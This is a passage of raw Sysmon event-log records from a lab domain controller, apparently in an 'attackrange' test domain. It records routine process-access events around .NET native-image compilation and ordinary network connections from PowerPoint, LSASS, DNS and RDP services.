gen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.560{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-BE0E-00000000BB01}6728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.544{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-BE0E-00000000BB01}6728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.544{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-BE0E-00000000BB01}6728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000080709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.016{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57603-false52.109.20.0-443https 354300x800000000000000080708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.699{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57601-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000080707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.699{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57601-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000080706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.537{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57600-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000080705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.537{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57599-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000080704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.536{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57598-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000080703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.536{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57597-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000080702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.536{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57596-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000080701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.520{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53683- 354300x800000000000000080700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.517{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-40369-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000080699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.513{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-BD0E-00000000BB01}7024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.497{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-BD0E-00000000BB01}7024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.497{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-BD0E-00000000BB01}7024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.450{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-BC0E-00000000BB01}5836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.435{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-BC0E-00000000BB01}5836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.435{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-BC0E-00000000BB01}5836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.419{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F4701CCEE24E3EDFBFD4CBE5028A9A8,SHA256=E7BFD78D9EBA06CDEF3421BFF5828CA837683B214DCE9CCB2D68B732D74F5542,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.372{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-BB0E-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.357{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-BB0E-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.357{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-BB0E-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.232{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-BA0E-00000000BB01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.216{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-BA0E-00000000BB01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.216{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-BA0E-00000000BB01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.091{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-B90E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.075{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-B90E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.075{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-B90E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.013{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-B80E-00000000BB01}5652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.997{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-B80E-00000000BB01}5652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 